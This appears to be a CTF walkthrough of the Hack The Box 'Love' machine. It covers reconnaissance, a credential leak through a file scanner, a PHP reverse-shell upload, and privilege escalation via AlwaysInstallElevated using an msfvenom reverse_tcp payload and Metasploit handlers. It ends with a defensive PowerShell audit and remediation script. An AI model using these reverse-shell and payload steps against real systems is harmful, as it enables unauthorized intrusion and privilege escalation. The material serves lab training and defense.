In this post, I would like to share a walkthrough of the Love machine.
This machine is rated EASY.
We need to read the following articles to fully root the machine:
- Penetration-Testing-Grimoire/always-install-elevated.md at master · RackunSec/Penetration-Testing-Grimoire · GitHub
- Always Install Elevated – Penetration Testing Lab (pentestlab.blog)
- Voting System 1.0 Shell Upload ≈ Packet Storm (packetstormsecurity.com)
Information Gathering on Love machine
Once the VPN connection is up, we can start information gathering on the machine by running nmap -sC -sV <IP Address> -Pn
# Nmap 7.91 scan initiated Sat May 1 17:44:08 2021 as: nmap -sC -sV -oA intial -Pn 10.129.102.135
Nmap scan report for 10.129.102.135
Host is up (0.66s latency).
Not shown: 993 closed ports
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.46 ((Win64) OpenSSL/1.1.1j PHP/7.3.27)
| http-cookie-flags:
| /:
| PHPSESSID:
|_ httponly flag not set
|_http-server-header: Apache/2.4.46 (Win64) OpenSSL/1.1.1j PHP/7.3.27
|_http-title: Voting System using PHP
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
443/tcp open ssl/http Apache httpd 2.4.46 (OpenSSL/1.1.1j PHP/7.3.27)
|_http-server-header: Apache/2.4.46 (Win64) OpenSSL/1.1.1j PHP/7.3.27
|_http-title: 403 Forbidden
| ssl-cert: Subject: commonName=staging.love.htb/organizationName=ValentineCorp/stateOrProvinceName=m/countryName=in
| Not valid before: 2021-01-18T14:00:16
|_Not valid after: 2022-01-18T14:00:16
|_ssl-date: TLS randomness does not represent time
| tls-alpn:
|_ http/1.1
445/tcp open microsoft-ds Microsoft Windows 7 - 10 microsoft-ds (workgroup: WORKGROUP)
3306/tcp open mysql?
| fingerprint-strings:
| DNSStatusRequestTCP, FourOhFourRequest, GenericLines, GetRequest, HTTPOptions, Help, Kerberos, LDAPBindReq, LDAPSearchReq, LPDString, NULL, RTSPRequest, SMBProgNeg, TerminalServerCookie, X11Probe:
|_ Host '10.10.16.13' is not allowed to connect to this MariaDB server
5000/tcp open http Apache httpd 2.4.46 (OpenSSL/1.1.1j PHP/7.3.27)
|_http-server-header: Apache/2.4.46 (Win64) OpenSSL/1.1.1j PHP/7.3.27
|_http-title: 403 Forbidden
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port3306-TCP:V=7.91%I=7%D=5/1%Time=608DCBE3%P=x86_64-pc-linux-gnu%r(NUL
SF:L,4A,"F\0\0\x01\xffj\x04Host\x20'10\.10\.16\.13'\x20is\x20not\x20allowe
SF:d\x20to\x20connect\x20to\x20this\x20MariaDB\x20server")%r(GenericLines,
SF:4A,"F\0\0\x01\xffj\x04Host\x20'10\.10\.16\.13'\x20is\x20not\x20allowed\
SF:x20to\x20connect\x20to\x20this\x20MariaDB\x20server")%r(GetRequest,4A,"
SF:F\0\0\x01\xffj\x04Host\x20'10\.10\.16\.13'\x20is\x20not\x20allowed\x20t
SF:o\x20connect\x20to\x20this\x20MariaDB\x20server")%r(HTTPOptions,4A,"F\0
SF:\0\x01\xffj\x04Host\x20'10\.10\.16\.13'\x20is\x20not\x20allowed\x20to\x
SF:20connect\x20to\x20this\x20MariaDB\x20server")%r(RTSPRequest,4A,"F\0\0\
SF:x01\xffj\x04Host\x20'10\.10\.16\.13'\x20is\x20not\x20allowed\x20to\x20c
SF:onnect\x20to\x20this\x20MariaDB\x20server")%r(DNSStatusRequestTCP,4A,"F
SF:\0\0\x01\xffj\x04Host\x20'10\.10\.16\.13'\x20is\x20not\x20allowed\x20to
SF:\x20connect\x20to\x20this\x20MariaDB\x20server")%r(Help,4A,"F\0\0\x01\x
SF:ffj\x04Host\x20'10\.10\.16\.13'\x20is\x20not\x20allowed\x20to\x20connec
SF:t\x20to\x20this\x20MariaDB\x20server")%r(TerminalServerCookie,4A,"F\0\0
SF:\x01\xffj\x04Host\x20'10\.10\.16\.13'\x20is\x20not\x20allowed\x20to\x20
SF:connect\x20to\x20this\x20MariaDB\x20server")%r(Kerberos,4A,"F\0\0\x01\x
SF:ffj\x04Host\x20'10\.10\.16\.13'\x20is\x20not\x20allowed\x20to\x20connec
SF:t\x20to\x20this\x20MariaDB\x20server")%r(SMBProgNeg,4A,"F\0\0\x01\xffj\
SF:x04Host\x20'10\.10\.16\.13'\x20is\x20not\x20allowed\x20to\x20connect\x2
SF:0to\x20this\x20MariaDB\x20server")%r(X11Probe,4A,"F\0\0\x01\xffj\x04Hos
SF:t\x20'10\.10\.16\.13'\x20is\x20not\x20allowed\x20to\x20connect\x20to\x2
SF:0this\x20MariaDB\x20server")%r(FourOhFourRequest,4A,"F\0\0\x01\xffj\x04
SF:Host\x20'10\.10\.16\.13'\x20is\x20not\x20allowed\x20to\x20connect\x20to
SF:\x20this\x20MariaDB\x20server")%r(LPDString,4A,"F\0\0\x01\xffj\x04Host\
SF:x20'10\.10\.16\.13'\x20is\x20not\x20allowed\x20to\x20connect\x20to\x20t
SF:his\x20MariaDB\x20server")%r(LDAPSearchReq,4A,"F\0\0\x01\xffj\x04Host\x
SF:20'10\.10\.16\.13'\x20is\x20not\x20allowed\x20to\x20connect\x20to\x20th
SF:is\x20MariaDB\x20server")%r(LDAPBindReq,4A,"F\0\0\x01\xffj\x04Host\x20'
SF:10\.10\.16\.13'\x20is\x20not\x20allowed\x20to\x20connect\x20to\x20this\
SF:x20MariaDB\x20server");
Service Info: Hosts: www.example.com, LOVE, www.love.htb; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
|_clock-skew: mean: 21m20s, deviation: 0s, median: 21m20s
| smb-security-mode:
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
| smb2-security-mode:
| 2.02:
|_ Message signing enabled but not required
| smb2-time:
| date: 2021-05-01T22:07:08
|_ start_date: N/A
Service detection performed. Please report any incorrect results at https://nmap.org/submit/
Let’s look at the website interface.
The website shows only a Voter’s ID and Password login form, and we don’t have credentials at the moment.
Let’s check the other ports mentioned in the nmap result. Those websites show a forbidden page.
Gaining Access on Love machine
Oh wait! There’s a subdomain mentioned in the nmap result: staging.love.htb
That website redirects to a Free File Scanner interface, which also requires login credentials.
Let’s click on the demo link at the top of the website.
Let’s submit the URL http://10.10.10.239:5000 to the scanner, and it returns admin credentials:
username: admin
password: @LoveIsInTheAir!!!!
We need to use those credentials on http://love.htb/admin
We managed to log into the VotingSystem dashboard.
Let’s do some research on the VotingSystem.
I found a few exploits that we can use against the system itself, as shown in the screenshot above.
However, the exploit didn’t work well for me, so I decided to find another way to get a reverse shell back to my machine.
After a while, I found another PHP reverse shell on the website here.
We need to download it and modify the PHP code slightly so that the reverse shell connects back to us. The modification needs to be made at sh=new Sh(‘127.0.0.1’,9000); replace the address and port with your VPN IP and port.
There are two locations where we can upload our shell.
*We need to start our nc listener first.
The first location requires us to create a position that we will use for this method. Once that is done, we create a new candidate and upload the shell through the picture uploader.
For the reverse shell to come back, we browse to love.htb/images and click the filename we saved the shell as.
The other location is the admin’s profile, where we can upload the shell through the replace picture option.
Maintaining Access
You will get the shell back if you upload the shell in either place.
We can read the user flag by going to C:\Users\Phoebe\Desktop and using the command “type user.txt“
Escalate to Root Privileges Access
We can run winpeas.exe on the victim’s machine after transferring the file from our attacker’s machine. After a while, we find that the “AlwaysInstallElevated” policy is enabled; this policy makes Windows Installer run MSI packages with elevated (SYSTEM) privileges for any user.
Let’s do some research on the “AlwaysInstallElevated” exploit.
We found some exploits that use the Metasploit Framework. So, let’s start using Metasploit.
Firstly, we need to create a crafted payload with the command msfvenom -p windows/meterpreter/reverse_tcp LHOST=<IP Address> LPORT=<Port> -f exe > darknite.exe
We need to transfer it to the victim’s machine.
I can execute the payload by typing the filename, just as shown above.
We can configure our Metasploit side by running two multi/handler sessions, backgrounding one of them.
We can read the root flag by going to C:\Users\Administrator\Desktop and using the “type root.txt” command.
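The policy winPEAS flagged is a plain registry setting, so an administrator can audit and fix it without any third-party tooling. The script below is an added example (not code from the original walkthrough or from winPEAS); the two registry paths and the value name are the documented Windows Installer policy locations, while the function names are our own. The important detail it encodes is that the policy only takes effect when the value is 1 in both HKLM and HKCU, so a host with only one hive set is not misconfigured.

```powershell
# Added example: audit and remediate the AlwaysInstallElevated policy.
# Registry locations are the standard Windows Installer policy keys;
# the function names (Test-/Disable-AlwaysInstallElevated) are ours.

$script:InstallerPolicyPaths = @(
    'HKLM:\SOFTWARE\Policies\Microsoft\Windows\Installer',
    'HKCU:\SOFTWARE\Policies\Microsoft\Windows\Installer'
)

function Test-AlwaysInstallElevated {
    [CmdletBinding()]
    param()

    $settings = foreach ($path in $script:InstallerPolicyPaths) {
        $value = $null
        if (Test-Path $path) {
            # Missing value or missing key both mean "policy not configured".
            $item  = Get-ItemProperty -Path $path -Name 'AlwaysInstallElevated' -ErrorAction SilentlyContinue
            $value = $item.AlwaysInstallElevated
        }
        $display = if ($null -eq $value) { 'not set' } else { $value }
        [pscustomobject]@{
            Hive    = $path.Split(':')[0]
            Path    = $path
            Value   = $display
            Enabled = ($value -eq 1)
        }
    }

    # Windows Installer honours the policy only when BOTH hives are set to 1.
    $enabledCount = @($settings | Where-Object Enabled).Count
    $exploitable  = ($enabledCount -eq $script:InstallerPolicyPaths.Count)

    [pscustomobject]@{
        Settings    = $settings
        Exploitable = $exploitable
        Remediation = if ($exploitable) {
            'Set AlwaysInstallElevated to 0 (or remove it) in both HKLM and HKCU, then run gpupdate /force.'
        } else {
            'No action needed: the policy is not effective on this host.'
        }
    }
}

function Disable-AlwaysInstallElevated {
    # Supports -WhatIf so the change can be previewed before it is applied.
    [CmdletBinding(SupportsShouldProcess)]
    param()

    foreach ($path in $script:InstallerPolicyPaths) {
        if (-not (Test-Path $path)) { continue }
        if ($PSCmdlet.ShouldProcess($path, 'Set AlwaysInstallElevated = 0')) {
            Set-ItemProperty -Path $path -Name 'AlwaysInstallElevated' -Value 0 -Type DWord
        }
    }
}

# Usage: report first, then remediate (preview with -WhatIf).
$report = Test-AlwaysInstallElevated
$report.Settings | Format-Table -AutoSize
"AlwaysInstallElevated effective: $($report.Exploitable)"
$report.Remediation
# Disable-AlwaysInstallElevated -WhatIf
```

Run the audit as the user you are worried about, because the HKCU half is per-user: a domain GPO that pushes the value into both hives is the usual way this ends up enabled fleet-wide, and in that case the registry fix must be made in the GPO rather than on the host.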
-THE END-
Happy Learning Guys!